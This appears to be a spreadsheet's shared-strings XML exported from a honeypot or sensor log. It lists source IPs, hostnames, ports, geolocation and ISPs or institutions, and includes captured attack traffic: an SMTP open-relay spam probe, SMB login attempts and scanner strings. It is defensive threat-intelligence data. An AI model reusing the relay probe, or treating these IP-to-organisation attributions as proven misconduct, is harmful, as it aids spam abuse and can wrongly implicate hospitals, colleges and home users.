  <si>
    <t>a34df42d213f4fb40e3d9a9781bc705c</t>
  </si>
  <si>
    <t>61.2.147.78</t>
  </si>
  <si>
    <t>::ffff:3d02:934e</t>
  </si>
  <si>
    <t>65e6c52091b9cfb80362174cb96a66ed</t>
  </si>
  <si>
    <t>102.182.85.135</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_SSH_H31&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>23&amp;&amp;22&amp;&amp;20514</t>
  </si>
  <si>
    <t>ZA</t>
  </si>
  <si>
    <t>South Africa</t>
  </si>
  <si>
    <t>FS</t>
  </si>
  <si>
    <t>Free State</t>
  </si>
  <si>
    <t>Fezile Dabi District Municipality</t>
  </si>
  <si>
    <t>Sasolburg</t>
  </si>
  <si>
    <t>957487</t>
  </si>
  <si>
    <t>-26.8136</t>
  </si>
  <si>
    <t>27.8169</t>
  </si>
  <si>
    <t>37611</t>
  </si>
  <si>
    <t>Afrihost (Pty) Ltd</t>
  </si>
  <si>
    <t>Afrihost Fibre</t>
  </si>
  <si>
    <t>2017-06-02</t>
  </si>
  <si>
    <t>::ffff:66b6:5587</t>
  </si>
  <si>
    <t>259c8c6229b3e4d248b9192595af732f</t>
  </si>
  <si>
    <t>14.102.103.164</t>
  </si>
  <si>
    <t>2010-09-13</t>
  </si>
  <si>
    <t>::ffff:e66:67a4</t>
  </si>
  <si>
    <t>3a31e60ec20d3e5f9430b55b1142f655</t>
  </si>
  <si>
    <t>117.193.158.187</t>
  </si>
  <si>
    <t>::ffff:75c1:9ebb</t>
  </si>
  <si>
    <t>5623feb6fa110baa07e07f1ee1fa0da1</t>
  </si>
  <si>
    <t>202.153.36.5</t>
  </si>
  <si>
    <t>17.4236</t>
  </si>
  <si>
    <t>78.4279</t>
  </si>
  <si>
    <t>::ffff:ca99:2405</t>
  </si>
  <si>
    <t>5d9fac493f63c50d31241de1dc69adc9</t>
  </si>
  <si>
    <t>48.216.248.211</t>
  </si>
  <si>
    <t>NA&amp;&amp;azpdegpgy3j8.stretchoid.com</t>
  </si>
  <si>
    <t>SMA-LAB_IRC_H9&amp;&amp;SMA-LAB_IMAP_HC1</t>
  </si>
  <si>
    <t>6667&amp;&amp;143&amp;&amp;NA&amp;&amp;445&amp;&amp;21&amp;&amp;123</t>
  </si>
  <si>
    <t>{Data_IRC:NA}&amp;&amp;{Data_IRC:{'command': 'MGLNDD_154.26.156.60_6667', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (48.216.248.211,33958)}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_NTP:{'mode': 'UnKnown', 'version': 'UnKnown'}}</t>
  </si>
  <si>
    <t>::ffff:30d8:f8d3</t>
  </si>
  <si>
    <t>1537da239873951769f95fcc81ace00c</t>
  </si>
  <si>
    <t>49.130.158.142</t>
  </si>
  <si>
    <t>::ffff:3182:9e8e</t>
  </si>
  <si>
    <t>f58ae23622aef9f13a4e4fdbeaec974b</t>
  </si>
  <si>
    <t>116.73.220.180</t>
  </si>
  <si>
    <t>::ffff:7449:dcb4</t>
  </si>
  <si>
    <t>c3766459a0ef2e21157807e4b378f35f</t>
  </si>
  <si>
    <t>113.53.46.89</t>
  </si>
  <si>
    <t>node-95l.pool-113-53.dynamic.totinternet.net</t>
  </si>
  <si>
    <t>Bang Bon</t>
  </si>
  <si>
    <t>8355932</t>
  </si>
  <si>
    <t>13.6618</t>
  </si>
  <si>
    <t>100.396</t>
  </si>
  <si>
    <t>::ffff:7135:2e59</t>
  </si>
  <si>
    <t>6701c374191d4ce7d02b9ef4dfc3bf65</t>
  </si>
  <si>
    <t>117.193.59.99</t>
  </si>
  <si>
    <t>::ffff:75c1:3b63</t>
  </si>
  <si>
    <t>1e7af14f899351b9f9b184d4c57a1a50</t>
  </si>
  <si>
    <t>76.95.179.154</t>
  </si>
  <si>
    <t>NA&amp;&amp;syn-076-095-179-154.res.spectrum.com</t>
  </si>
  <si>
    <t>Anaheim</t>
  </si>
  <si>
    <t>5323810</t>
  </si>
  <si>
    <t>92806</t>
  </si>
  <si>
    <t>33.8362</t>
  </si>
  <si>
    <t>-117.872</t>
  </si>
  <si>
    <t>::ffff:4c5f:b39a</t>
  </si>
  <si>
    <t>862d9457c1175bc6a03a382ff4133f6c</t>
  </si>
  <si>
    <t>49.206.115.15</t>
  </si>
  <si>
    <t>Singānallūr</t>
  </si>
  <si>
    <t>1256184</t>
  </si>
  <si>
    <t>10.999</t>
  </si>
  <si>
    <t>77.0324</t>
  </si>
  <si>
    <t>131269</t>
  </si>
  <si>
    <t>::ffff:31ce:730f</t>
  </si>
  <si>
    <t>972208b222335c7aae4afd5459da7b51</t>
  </si>
  <si>
    <t>120.61.28.6</t>
  </si>
  <si>
    <t>::ffff:783d:1c06</t>
  </si>
  <si>
    <t>43efa0a3e136f84bbb98f46ee686d291</t>
  </si>
  <si>
    <t>121.181.118.123</t>
  </si>
  <si>
    <t>700-422</t>
  </si>
  <si>
    <t>::ffff:79b5:767b</t>
  </si>
  <si>
    <t>7cebfcab9b8659422704ca06b39ad611</t>
  </si>
  <si>
    <t>103.83.29.221</t>
  </si>
  <si>
    <t>Bengaluru (AGS Layout)</t>
  </si>
  <si>
    <t>12.9114</t>
  </si>
  <si>
    <t>77.5384</t>
  </si>
  <si>
    <t>150633</t>
  </si>
  <si>
    <t>MARUTHI INTERNET PRIVATE LIMITED</t>
  </si>
  <si>
    <t>Maruthi Internet Private Limited</t>
  </si>
  <si>
    <t>NIXI</t>
  </si>
  <si>
    <t>2023-02-06</t>
  </si>
  <si>
    <t>MARUTHIS</t>
  </si>
  <si>
    <t>::ffff:6753:1ddd</t>
  </si>
  <si>
    <t>4e90c2d4f0362f397185604c39ef873d</t>
  </si>
  <si>
    <t>117.196.60.234</t>
  </si>
  <si>
    <t>::ffff:75c4:3cea</t>
  </si>
  <si>
    <t>6600ba9f162cfb45e07f882fe5246014</t>
  </si>
  <si>
    <t>117.215.30.70</t>
  </si>
  <si>
    <t>::ffff:75d7:1e46</t>
  </si>
  <si>
    <t>e11aa0e59346310bb45112cc468d2e45</t>
  </si>
  <si>
    <t>59.183.21.113</t>
  </si>
  <si>
    <t>::ffff:3bb7:1571</t>
  </si>
  <si>
    <t>6b1e3c8ec5a02c0d7bd656d03865b0a2</t>
  </si>
  <si>
    <t>195.211.191.58</t>
  </si>
  <si>
    <t>abuseipdb&amp;&amp;SMA-LAB_SMTP_HC1</t>
  </si>
  <si>
    <t>NA&amp;&amp;25</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Fri, 28 Mar 2025 04:33:56 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000D_
To: spameri@tiscali.it_x000D_
Date: Sat, 29 Mar 2025 02:47:26 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Sun, 30 Mar 2025 15:34:54 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Fri, 4 Apr 2025 07:30:37 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Fri, 4 Apr 2025 13:16:32 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Sat, 5 Apr 2025 01:52:47 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '122.170.7.108_x000D_
To: spameri@tiscali.it_x000D_
Date: Tue, 8 Apr 2025 06:50:03 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}</t>
  </si>
  <si>
    <t>::ffff:c3d3:bf3a</t>
  </si>
  <si>
    <t>63362e5f7d4b596013ee10a0f5f5fc6e</t>
  </si>
  <si>
    <t>205.164.204.236</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16</t>
  </si>
  <si>
    <t>Trench Town</t>
  </si>
  <si>
    <t>17.9892</t>
  </si>
  <si>
    <t>-76.8024</t>
  </si>
  <si>
    <t>11580</t>
  </si>
  <si>
    <t>Island Networks Ltd</t>
  </si>
  <si>
    <t>AGIS</t>
  </si>
  <si>
    <t>::ffff:cda4:ccec</t>
  </si>
  <si>
    <t>520906db7d7e8077896c0d4a96fd24dd</t>
  </si>
  <si>
    <t>171.100.28.6</t>
  </si>
  <si>
    <t>171-100-28-6.static.asianet.co.th&amp;&amp;NA</t>
  </si>
  <si>
    <t>True Internet Corporation CO. Ltd.</t>
  </si>
  <si>
    <t>Truenet CM</t>
  </si>
  <si>
    <t>::ffff:ab64:1c06</t>
  </si>
  <si>
    <t>3c18c05f4f4a7ec61c99572694c5db4e</t>
  </si>
  <si>
    <t>14.248.90.118</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H24&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;36144&amp;&amp;3306&amp;&amp;1433</t>
  </si>
  <si>
    <t>::ffff:ef8:5a76</t>
  </si>
  <si>
    <t>c09f4c352d028587e13dd947f6edc7e9</t>
  </si>
  <si>
    <t>14.139.50.218</t>
  </si>
  <si>
    <t>Bhopal (Murli Nagar)</t>
  </si>
  <si>
    <t>462001</t>
  </si>
  <si>
    <t>23.3027</t>
  </si>
  <si>
    <t>77.4044</t>
  </si>
  <si>
    <t>Bhopal Memorial Hospital &amp; Research Centre (BMHRC)</t>
  </si>
  <si>
    <t>NKN-BHMRC-MP</t>
  </si>
  <si>
    <t>::ffff:e8b:32da</t>
  </si>
  <si>
    <t>a7aab54f2879fe9f6dc386de78996ca5</t>
  </si>
  <si>
    <t>120.61.245.104</t>
  </si>
  <si>
    <t>::ffff:783d:f568</t>
  </si>
  <si>
    <t>68cb51506ce01a599b3ac0d4a11ef0de</t>
  </si>
  <si>
    <t>117.203.166.4</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H10&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;14607&amp;&amp;3306&amp;&amp;445&amp;&amp;1433</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (117.203.166.4,59665)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (117.203.166.4,49951)}&amp;&amp;{Data_SMB:Incoming connection (117.203.166.4,50422)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:75cb:a604</t>
  </si>
  <si>
    <t>9a08fb977dcd62a1ad0963d69f2375fa</t>
  </si>
  <si>
    <t>115.76.120.246</t>
  </si>
  <si>
    <t>Vietelgprs</t>
  </si>
  <si>
    <t>GPRS Services</t>
  </si>
  <si>
    <t>::ffff:734c:78f6</t>
  </si>
  <si>
    <t>46d840ed91f8e693947d8e980ce125fd</t>
  </si>
  <si>
    <t>103.30.65.16</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_SSH_H38&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_HTTP_H30&amp;&amp;SMA-LAB_SOCKS5_H32&amp;&amp;SMA-LAB_NTP_H38&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_SSH_H15&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_LDAP_H16&amp;&amp;SMA-LAB_SMB_H7&amp;&amp;SMA-LAB_IPP_H12&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;22&amp;&amp;49085&amp;&amp;80&amp;&amp;1080&amp;&amp;123&amp;&amp;5900&amp;&amp;22&amp;&amp;443&amp;&amp;389&amp;&amp;445&amp;&amp;631&amp;&amp;61691&amp;&amp;3306&amp;&amp;1433</t>
  </si>
  <si>
    <t>::ffff:671e:4110</t>
  </si>
  <si>
    <t>32a5081ece9de48a7d7e774bd0930822</t>
  </si>
  <si>
    <t>117.232.9.122</t>
  </si>
  <si>
    <t>::ffff:75e8:97a</t>
  </si>
  <si>
    <t>1da1b18d091962e19a243184d681f82a</t>
  </si>
  <si>
    <t>101.51.254.49</t>
  </si>
  <si>
    <t>::ffff:6533:fe31</t>
  </si>
  <si>
    <t>4ef53d109b011f14727bf51ef507f39d</t>
  </si>
  <si>
    <t>103.249.26.213</t>
  </si>
  <si>
    <t>Smartlink Solutions Pvt. Ltd.</t>
  </si>
  <si>
    <t>::ffff:67f9:1ad5</t>
  </si>
  <si>
    <t>53c45b98d0f63837e9e2b855f3dd2a12</t>
  </si>
  <si>
    <t>111.246.112.23</t>
  </si>
  <si>
    <t>111-246-112-23.dynamic-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:6ff6:7017</t>
  </si>
  <si>
    <t>57fab68935194b5f6d5963294722d242</t>
  </si>
  <si>
    <t>79.51.44.245</t>
  </si>
  <si>
    <t>NA&amp;&amp;host-79-51-44-245.retail.telecomitalia.it</t>
  </si>
  <si>
    <t>72</t>
  </si>
  <si>
    <t>Campania</t>
  </si>
  <si>
    <t>Naples</t>
  </si>
  <si>
    <t>Nola</t>
  </si>
  <si>
    <t>3172227</t>
  </si>
  <si>
    <t>80035</t>
  </si>
  <si>
    <t>40.9271</t>
  </si>
  <si>
    <t>14.5289</t>
  </si>
  <si>
    <t>NAS DHCP Pool Nola</t>
  </si>
  <si>
    <t>::ffff:4f33:2cf5</t>
  </si>
  <si>
    <t>3b1bf37a940849b7e667d19e78ace993</t>
  </si>
  <si>
    <t>117.195.137.132</t>
  </si>
  <si>
    <t>::ffff:75c3:8984</t>
  </si>
  <si>
    <t>b1be92d43c3b87a4b6975fd6c2c25737</t>
  </si>
  <si>
    <t>117.239.149.57</t>
  </si>
  <si>
    <t>Tirupati</t>
  </si>
  <si>
    <t>Pākāla (P.Kothakota)</t>
  </si>
  <si>
    <t>1260830</t>
  </si>
  <si>
    <t>517112</t>
  </si>
  <si>
    <t>13.4174</t>
  </si>
  <si>
    <t>79.1159</t>
  </si>
  <si>
    <t>Vemu Institute of Technology</t>
  </si>
  <si>
    <t>::ffff:75ef:9539</t>
  </si>
  <si>
    <t>ccf75401caff792c64c0895dc233e4d7</t>
  </si>
  <si>
    <t>103.24.126.45</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>1091&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>2013-04-15</t>
  </si>
  <si>
    <t>PEL-IN</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.24.126.45,52227)}&amp;&amp;{Data_SMB:Incoming connection (103.24.126.45,53614)}</t>
  </si>
  <si>
    <t>::ffff:6718:7e2d</t>
  </si>
  <si>
    <t>c2e4b151792a5c00fa8f60cb91fbd55a</t>
  </si>
  <si>
    <t>59.93.162.109</t>
  </si>
  <si>
    <t>::ffff:3b5d:a26d</t>
  </si>
  <si>
    <t>9393ad787bfa45f172f89ba99155ab38</t>
  </si>
  <si>
    <t>117.214.192.66</t>
  </si>
  <si>
    <t>Shahid Bhagat Singh Nagar</t>
  </si>
  <si>
    <t>Banga</t>
  </si>
  <si>
    <t>1277338</t>
  </si>
  <si>
    <t>31.1887</t>
  </si>
  <si>
    <t>75.9949</t>
  </si>
  <si>
    <t>::ffff:75d6:c042</t>
  </si>
  <si>
    <t>1a5f4ec3eecf0ba59854ba7105600962</t>
  </si>
  <si>
    <t>125.228.157.180</t>
  </si>
  <si>
    <t>125-228-157-180.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>::ffff:7de4:9db4</t>
  </si>
  <si>
    <t>a7951cd9aab4a17e3a769efd843d45cf</t>
  </si>
  <si>
    <t>93.112.225.90</t>
  </si>
  <si>
    <t>Mecca Region</t>
  </si>
  <si>
    <t>Jeddah</t>
  </si>
  <si>
    <t>105343</t>
  </si>
  <si>
    <t>21.4901</t>
  </si>
  <si>
    <t>39.1862</t>
  </si>
  <si>
    <t>::ffff:5d70:e15a</t>
  </si>
  <si>
    <t>d6b0e2341efd5a5b99a5f5f4cd466d4a</t>
  </si>
  <si>
    <t>114.42.158.121</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-42-158-121.dynamic-ip.hinet.net</t>
  </si>
  <si>
    <t>::ffff:722a:9e79</t>
  </si>
  <si>
    <t>c1f0c1ac5f844e068029b6a31776c5a7</t>
  </si>
  <si>
    <t>218.161.20.75</t>
  </si>
  <si>
    <t>NA&amp;&amp;218-161-20-75.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>23&amp;&amp;17355&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:daa1:144b</t>
  </si>
  <si>
    <t>e6b1b3970c24861da0028551eb240dc1</t>
  </si>
  <si>
    <t>121.200.53.151</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H33&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_ORACLE_H45&amp;&amp;SMA-LAB_REDIS_H18&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_SMB_H46</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;60323&amp;&amp;59862&amp;&amp;445&amp;&amp;1521&amp;&amp;6379&amp;&amp;7646</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (121.200.53.151,60183)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:79c8:3597</t>
  </si>
  <si>
    <t>2480f1421f1c28323418b3d4a9ecc937</t>
  </si>
  <si>
    <t>180.93.172.63</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H43</t>
  </si>
  <si>
    <t>::ffff:b45d:ac3f</t>
  </si>
  <si>
    <t>812c11637250256ed8bb6e43f58ed9db</t>
  </si>
  <si>
    <t>210.212.210.68</t>
  </si>
  <si>
    <t>Eluru</t>
  </si>
  <si>
    <t>Chebrolu</t>
  </si>
  <si>
    <t>10768055</t>
  </si>
  <si>
    <t>533449</t>
  </si>
  <si>
    <t>17.2134</t>
  </si>
  <si>
    <t>82.3176</t>
  </si>
  <si>
    <t>Adarsh College Of Engineering</t>
  </si>
  <si>
    <t>ACEE</t>
  </si>
  <si>
    <t>::ffff:d2d4:d244</t>
  </si>
  <si>
    <t>2d691f18eabc8d757e748eb024c4211c</t>
  </si>
  <si>
    <t>117.202.138.159</t>
  </si>
  <si>
    <t>::ffff:75ca:8a9f</t>
  </si>
  <si>
    <t>bc9c6b44dbe2ff1f43107663bd1f46c7</t>
  </si>
  <si>
    <t>103.175.168.36</t>
  </si>
  <si>
    <t>Hālīsahar</t>
  </si>
  <si>
    <t>1270484</t>
  </si>
  <si>
    <t>22.9322</t>
  </si>
  <si>
    <t>88.4186</t>
  </si>
  <si>
    <t>::ffff:67af:a824</t>
  </si>
  <si>
    <t>f781c5b3b33f6493f5369fb18cdab3c6</t>
  </si>
  <si>
    <t>122.254.29.246</t>
  </si>
  <si>
    <t>Kaohsiung</t>
  </si>
  <si>
    <t>Fongshan District</t>
  </si>
  <si>
    <t>1673816</t>
  </si>
  <si>
    <t>22.5845</t>
  </si>
  <si>
    <t>120.401</t>
  </si>
  <si>
    <t>24165</t>
  </si>
  <si>
    <t>UNION BROADBAND NETWORK</t>
  </si>
  <si>
    <t>PHOENIX</t>
  </si>
  <si>
    <t>TFN Media Co., Ltd.</t>
  </si>
  <si>
    <t>::ffff:7afe:1df6</t>
  </si>
  <si>
    <t>ba8cef46ec283a219ff5a524359b6241</t>
  </si>
  <si>
    <t>43.249.52.75</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (43.249.52.75,52525)}&amp;&amp;{Data_SMB:Incoming connection (43.249.52.75,53014)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:2bf9:344b</t>
  </si>
  <si>
    <t>99964f8d78c90cae9b47c4cadcdc593b</t>
  </si>
  <si>
    <t>117.192.128.253</t>
  </si>
  <si>
    <t>Vijayanagar</t>
  </si>
  <si>
    <t>Hampi</t>
  </si>
  <si>
    <t>1270448</t>
  </si>
  <si>
    <t>15.3352</t>
  </si>
  <si>
    <t>76.4603</t>
  </si>
  <si>
    <t>::ffff:75c0:80fd</t>
  </si>
  <si>
    <t>9d43e57a4815b12747ac646c3fd458ea</t>
  </si>
  <si>
    <t>36.93.237.114</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_HC1</t>
  </si>
  <si>
    <t>HSI Indihome</t>
  </si>
  <si>
    <t>TELKOMNET</t>
  </si>
  <si>
    <t>::ffff:245d:ed72</t>
  </si>
  <si>
    <t>17213c722450f520ef9ff9d12305a0bc</t>
  </si>
  <si>
    <t>2.189.92.14</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H39</t>
  </si>
  <si>
    <t>22458&amp;&amp;23&amp;&amp;80</t>
  </si>
  <si>
    <t>Bandar Abbas (Qal‘eh Shāhī)</t>
  </si>
  <si>
    <t>27.1779</t>
  </si>
  <si>
    <t>56.2744</t>
  </si>
  <si>
    <t>42337</t>
  </si>
  <si>
    <t>Respina Networks &amp; Beyond PJSC</t>
  </si>
  <si>
    <t>Dadeh Pardazan Avaye Bandar Company</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Content-Length': '0', 'Host': '38.60.224.106:80', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:2bd:5c0e</t>
  </si>
  <si>
    <t>364cc71965da51c1a55185bcd07502e6</t>
  </si>
  <si>
    <t>117.214.97.35</t>
  </si>
  <si>
    <t>::ffff:75d6:6123</t>
  </si>
  <si>
    <t>c6aae29a66c780c96d95c2d9ef4e983d</t>
  </si>
  <si>
    <t>117.255.25.202</t>
  </si>
  <si>
    <t>::ffff:75ff:19ca</t>
  </si>
  <si>
    <t>c01b9d521834ffd8bc847950a9a05f77</t>
  </si>
  <si>
    <t>59.183.21.181</t>
  </si>
  <si>
    <t>::ffff:3bb7:15b5</t>
  </si>
  <si>
    <t>9b5d4e8d00079cccb583b6786b3cd413</t>
  </si>
  <si>
    <t>103.191.100.41</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;15784&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>Nandyal</t>
  </si>
  <si>
    <t>Nandyāl</t>
  </si>
  <si>
    <t>1261927</t>
  </si>
  <si>
    <t>15.478</t>
  </si>
  <si>
    <t>78.4836</t>
  </si>
  <si>
    <t>133656</t>
  </si>
  <si>
    <t>Krp Communications</t>
  </si>
  <si>
    <t>KRP COMMUNICATIONS</t>
  </si>
  <si>
    <t>::ffff:67bf:6429</t>
  </si>
  <si>
    <t>aa30b304aa2869af852f1cf84835ee47</t>
  </si>
  <si>
    <t>79.45.218.145</t>
  </si>
  <si>
    <t>host-79-45-218-145.retail.telecomitalia.it</t>
  </si>
  <si>
    <t>Emilia-Romagna</t>
  </si>
  <si>
    <t>Bologna</t>
  </si>
  <si>
    <t>Villa Salina</t>
  </si>
  <si>
    <t>8949441</t>
  </si>
  <si>
    <t>44.5545</t>
  </si>
  <si>
    <t>11.3518</t>
  </si>
  <si>
    <t>::ffff:4f2d:da91</t>
  </si>
  <si>
    <t>3d3256485e815ec6a4bb6e94326fdd39</t>
  </si>
  <si>
    <t>117.193.69.58</t>
  </si>
  <si>
    <t>Tuticorin</t>
  </si>
  <si>
    <t>Eral</t>
  </si>
  <si>
    <t>1272027</t>
  </si>
  <si>
    <t>8.62584</t>
  </si>
  <si>
    <t>78.0228</t>
  </si>
  <si>
    <t>::ffff:75c1:453a</t>
  </si>
  <si>
    <t>4fdc7c1557b7b1180c4ff89957ab014d</t>
  </si>
  <si>
    <t>117.192.37.113</t>
  </si>
  <si>
    <t>::ffff:75c0:2571</t>
  </si>
  <si>
    <t>7f844039a39c64c9fc4416a7f883ac34</t>
  </si>
  <si>
    <t>117.206.62.50</t>
  </si>
  <si>
    <t>::ffff:75ce:3e32</t>
  </si>
  <si>
    <t>6507a4ca0e75c7be33b94525ffdec2dc</t>
  </si>
  <si>
    <t>103.57.150.135</t>
  </si>
  <si>
